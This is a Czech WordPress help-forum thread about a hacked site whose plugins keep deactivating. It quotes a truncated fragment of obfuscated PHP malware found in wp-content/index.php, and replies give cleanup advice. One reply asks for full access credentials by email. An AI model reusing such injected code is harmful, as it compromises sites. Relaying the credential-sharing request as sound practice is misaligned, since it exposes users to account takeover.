Zvolené téma obsahuje celkem 8 odpovědí. Do diskuze (4 účastníci) se naposledy zapojil uživatel 
-
Příspěvky
-
Zdravím, cca před měsícem jsem narazil u známého na hostingu na divný problém, který se cca před 10 dny opakoval, takže už ho považuji za větší.
Na jednom hostingu (endora) se z ničehonic deaktivovaly všechny pluginy – tady je chybová hláška:
“Plugin wordpress-seo/wp-seo.php byl deaktivován, protože se objevila chyba: Plugin patrně nemá platnou hlavičku se základními informacemi” – to je přesné znění.
Snažil jsem to googlit (samozřejmě v původním textu v en), ale nenašel jsem nic.
Divné ještě bylo, že v souboru wp-content/index.php a ještě v několik souborech, byl tento “kód”:
<?php $sojzebpwuk = 'vufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:*%x5c%x7824%x5c%x782f%x24-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]27 atd atd, bylo to fakt dlouhé.Nevím, co s tím? Já jsem se s tím nikdy nesetkal dříve u sebe, ale u toho známého se to stalo 2x za poslední měsíc.
Nejsem odborník, ale přijde mi to jako napadení webu… Tím že se to opakuje, a tím, že by to měly být kompletně všechny pluginy (tak jsem to pochopil), to získalo “děsivý” nádech :)
Čím to začalo? Nějaká aktualizace, nahrávání souboru?
V lepším případě je to menší vtípek některého pluginu, či jeho autora… ;)bohužel přes bezpečnost moc nejsem, takže by to chtělo někoho zasvěceného (admin?), nebo zcela jiné fórum… djpw.cz
Díky za reakci, ten spouštěcí mechanismus byl asi ten, že známý si nahrál na ftp fotku (přes filezilla) a do několika minut mu to spadlo, jenže prý jeho PC je čisté.
Rozhodně to vypadá na zavirovaný web. Soubory pluginů byly změněny a po přístupu do administrace byly tudíž pluginy automaticky deaktivovány (takže by se vir neměl snad dále projevovat – pokud není napadené i jádro WordPressu).
Vir se tam mohl dostat pokud měl známý třeba něco nakaženého v počítači (a někdo tak získal přístup k FTP) nebo šlo pouze o shodu okolností a může za to klasicky nějaký plugin či šablona. Těžko říci, bude to chtít všechno zkontrolovat, změnit hesla, aktualizovat a přeinstalovat pluginy, šablonu i WordPress. Hlavně by to také chtělo objevit příčinu, protože jinak se to může časem zase objevit znovu…
Díky za reakci, uvidím do budoucna, snad to bude OK
dnes další pád… nic jsem s webem nedělal jenom jsem se přihlásil a přepnul na pluginy protože jsem chtěl jeden přidat… :-(
já jsem ten známý :-)
Aha :-) Platí pořád výše uvedené, web je patrně napadený a je třeba ho pořádně vyčistit (přeinstalovat WordPress, pluginy a šablonu, změnit hesla, pokusit se odhalit příčinu napadení). Možná by také šlo obnovit ze zálohy (pokud nějakou máte uchovanou nebo zálohy provádí hosting) původní nezavirovanou verzi…
Pokud se do toho nechcete sám pouštět, tak pošlete prosím kompletní přístupy na email pavelevap@separatista.net, mohu se na to zkusit podívat (do jaké míry je web napaden), ale v případě samotného čistění by už šlo o standardní placenou zakázku…
Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.